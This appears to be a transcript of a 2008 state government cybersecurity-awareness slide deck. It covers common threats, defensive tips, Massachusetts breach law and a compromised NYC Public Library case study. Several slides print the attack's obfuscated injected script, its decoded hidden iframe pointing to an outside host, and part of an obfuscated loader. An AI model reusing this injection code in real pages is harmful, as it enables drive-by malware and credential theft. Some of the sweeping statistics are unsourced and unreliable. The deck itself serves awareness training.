1 / 33

Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]

Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]. Commonwealth of Mass. Information Technology Division November, 2008. Objectives for Today. Understand network security threats Learn simple defensive measures

Roberta
Download Presentation

Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Cyber Security Awareness[Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask] Commonwealth of Mass. Information Technology Division November, 2008

  2. Objectives for Today • Understand network security threats • Learn simple defensive measures • Review some recent breaches • Introduce applicable new legislation

  3. The Sermon • Sobering Statistics • Why do we need to be here today? • The Threats • How Things Go Wrong • Protecting Yourself • Have I Been Compromised? • A Few High-Profile Case Studies • A Recent Eye-Opening Incident • Security Resources and References • Q & A

  4. Statistics • One new infected web page is discovered every 5 seconds • One in 500 e-mail messages contains confidential information • One in 2500 e-mail messages contains an infected attachment • 41% of people use the same password at every site they visit • In 2007, 37000 reported breaches of government and private systems occurred • Revenues from cybercrime now exceed drug trafficking as the most lucrative illegal global business, estimated at more than $1 trillion annually in illegal profits • 75 percent of companies surveyed in 2004 reported a data-security breach within the past 12 months. (The Ponemon Institute) • 70% of security incidents are inside jobs. (Gartner Group) • “Many government offices don’t even know yet that they are leaking information. 90% of cases are probably still not known.” – McAfee Criminology Report

  5. Why are we here today? • The World has Changed! • Flying? • Technology Advancements • Moore’s Law: 50+ years of supporting data • Processor Speed • Memory (Smaller, Faster, Larger Capacity) • Hard Drives (Smaller, with Larger Capacity) • Price (“Bang per Buck”) • What was Impossible 10 Years Ago is Routine Today. • Searching for a Cure to Web Malware

  6. Our Mission • We still need to do our jobs • Educating Students of the Commonwealth • Securing Cyber-Resources • ID Theft & Data Breach Legislation • M.G.L. Ch 93H • Executive Order 504 • 201 CMR 17.00

  7. The Challenge • Walking the tightrope between: • Taking full advantage of the constantly expanding wealth of IT resources available to us, and • Increased risk of exposure to attacks that accompanies increased reliance on technology. • Allowing business operations anytime and anywhere, via an increasing number of different devices and to an increasing number of mobile users and customers.

  8. Threats to Students • MySpace • FaceBook • YouTube • Peer-to-Peer Networks • Instant Messaging • Cyber Predators/Bullies • Inappropriate/Offensive Web Content

  9. Threats to Networks • Two primary categories of threat: • Denial of Service • Loss/Leakage of Sensitive Data

  10. Denial of Service (DoS) • Definition: • Flooding a network with useless traffic, to the point of slowing or completely interrupting regular services • Often in combination with groups of other remotely-controlled computers • a/k/a Bot Nets • Result: Distributed Denial of Service (DDoS)

  11. Data Loss/Leakage • Definition: • Accidental leaking of sensitive information through sent data • Refers to the transmission of data which are either sensitive or useful in the further exploitation of the system through standard data channels • Result → compromise of data confidentiality • Since 2005, more than 200 million victims of data breach have been reported!

  12. How Things Go Wrong • Actively • User does something explicit to enable compromise • Open an infected email attachment • Follow a malicious web link • Accept IM-initiated downloads • Execute Web 2.0 rogue application • Passively • Attacker breaks into the user’s PC via scans • Unpatched operating system • Buggy application software • Vulnerable open ports • Compromised legitimate web sites

  13. How Things Go Wrong (cont.) • Carelessness • 98% of breaches are the result of “stupidity or inadvertent user action.” (IANS, 2007) • Actions by Malicious Insiders • 1.5% of breaches • Efforts by Organized Crime, Industrial Spies, and Foreign Government Agents • Least Frequent (~ 0.5%), but Most Costly, Most Sophisticated, and Most Difficult to Detect and Defend Against

  14. Who is Most Vulnerable? • Those who don’t patch regularly and don’t keep A/V up to date • Dial-up Users (but not very appealing to attackers) • Home Broadband Users • University Users • Mobile Users

  15. Protecting Yourself • Patch, Patch, Patch! • Use auto-update whenever possible • Anti-Virus Software (update daily) • Anti-SpyWare Software • Personal Firewall Software • Set and use good passwords on all accounts • How Strong is Your Password? • Encrypt Sensitive Data • Separate Student and Teacher/Admin Networks

  16. Protecting Yourself (cont.) • Wireless Networks… Beware! • Wireless Routers/Access Points: • Change default password and default SSID • SSID name should be “non-trivial” • Disable broadcasting of SSID if possible • Enable WPA/WPA-2 encryption, and change default key • Enable and use MAC filtering • Don’t save user IDs and passwords on your hard drive • Don’t Web surf from a privileged account! • Turn off auto-run for removable media • Practice “Safe Internet” • E-mail attachments • Downloads from Questionable Sites (esp. Freeware) • Peer-to-Peer Networks; Promiscuous Files Sharing

  17. 10 Tips for Fighting Malware • Install (and use!) Anti-Virus Software • Install a Personal Firewall • Install an Anti-Spyware Tool • Patch! • Keep Browser Security Settings at Medium or High • Just Say “No!” to Orgs You Don’t Know/Trust • Avoid Browser Search-Help Bars • Verify Software Certificates Trusted by Your Browser • Get a Credit Card Only for Internet Shopping • Don’t Run Executable E-mail Attachments (Even From a Known Source)

  18. Have I Been Compromised? • How to tell if you’ve fallen victim • Abnormal slowdown in performance • Mysterious failures in commonly-used apps • Email • Web surfing • Unexpected popups • Mysterious/Unexpected outbound traffic • The only sure-fire way to detect a compromise • Cleaning a Bot: • Painful! • Requires 8-16 hours of cleanup time • Best if done by a professional

  19. Data Breach & ID Theft • M. G. L. c. 93H and 93I • New law went into effect October 31, 2007 • Civil fine of up to $100 per affected person • Executive Order 504 • Mandatory information security training • Effective September 19, 2008 • Training for current staff within 12 months • 201 CMR 17.00 • Mandates encryption of personal data • Effective January 1, 2009

  20. Cyber-Breach Poster Children • Milton Academy Network Breach (Nov ’07) • Needham PowerSchool Breach (August ’08) • GOP Stolen Laptop Unencrypted (September ’08) • CardSystems Solutions • TJX Companies, Inc. • CitiFinancial Services • Boston College • Monster.com • Massachusetts DPL • Nordea Bank (Sweden)

  21. In the News • Commonwealth of PA, 1/4/08 • Network attacked via compromised agency web pages • SQL injection used to update DB tables with links to malicious website • Users who visit compromised agency’s web site are silently redirected to a series of malicious web pages that try to exploit client-side (i.e., user’s) vulnerabilities in a number of applications • IE, RealPlayer, et al • Vulnerable systems become infected with malware • An example of “drive-by downloads”

  22. Evolving Threats to Users • New and sophisticated forms of attack • “Customized” viruses, self-modifying threats, and threats that “attack back” • Attacks targeting new technologies • Peer-to-peer and VoIP services • Attacks targeting online social networks • MySpace, Facebook, YouTube, etc. • Attacks targeting online services • Especially online banking

  23. New Threat: Spamdexing • Web Searches! • 20% lead to unwanted content or malware sites • 80% of search blocks point to offensive content • “Drive-by Downloads” • Compromised, legitimate web site silently redirects user to malware sites • Mitigation: “corporate safe web search tool” • Notify web users of potential risks in real time

  24. Resources & References • US-CERT (United States Computer Emergency Readiness Team) • http://www.us-cert.gov/ • MS-ISAC (Multi-State Information Sharing and Access Center) • http://www.msisac.org • Identity Theft Research Center • http://www.idtheftcenter.org

  25. Close to Home: a Lesson • Analysis completed on October 30, 2007 • Involved breach of non-secret military network • But… could happen to anyone • Attack vector? • New York City public library!

  26. NYC Public Library

  27. NYC Public Library (cont.)

  28. NYC Public Library (cont.)

  29. NYC Public Library (cont.) • Hidden in the bogus NYPL web page is: • What’s that??? <script type="text/javascript"> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script>

  30. NYC Public Library (cont.) • What’s really there: <iframe src="http[:]//fotballportal.info/out.php?s_id=1" style="visibility: hidden;display: none"></iframe> • This redirects user to “http[:]//meraxe.com/fsp1/index.php” • This all happens silently and invisibly! • What’s at meraxe.com…?

  31. NYC Public Library (cont.) • At meraxe.com, we find: • <script>function v4726d05808fd9(v4726d058097a8){ function v4726d05809f78 () {var v4726d0580a748=16; return v4726d0580a748;} return(parseInt(v4726d058097a8,v4726d05809f78()));}function v4726d0580af18(v4726d0580b6e8){ function v4726d0580ce59 () {var v4726d0580d630=2; return v4726d0580d630;} var v4726d0580beb8='';for(v4726d0580c68d=0; v4726d0580c68d<v4726d0580b6e8.length; v4726d0580c68d+=v4726d0580ce59()){ v4726d0580beb8+=(String.fromCharCode(v4726d05808fd9(v4726d0580b6e8.substr(v4726d0580c68d, v4726d0580ce59()))));}return v4726d0580beb8;} document.write(v4726d0580af18('Truncated));</script> • Effects: • The above code is (silently) downloaded and executed

  32. NYC Public Library (cont.) • What happened??? • Downloadedandexecuteda file (age.exe) • Added file c:\WINDOWS\system32\control.dll • Added several Registry entries • Control.dll is loaded as a Browser Helper Object (BHO) when IE is started and becomes a keylogger • Deleted itself • Effects: • Control.dll monitors data entered into forms in IE • Steals user’s login credentials for legitimate web sites • On-line banking, credit cards, eBay, Paypal, etc, etc • “Phones home” with stolen data

  33. Q & A • Summary: • Protecting yourself is only half the battle • Constant vigilance & awareness are a must • “Trust, but verify.” – Ronald Regan, quoting an old Russian (!) proverb • Questions…?

More Related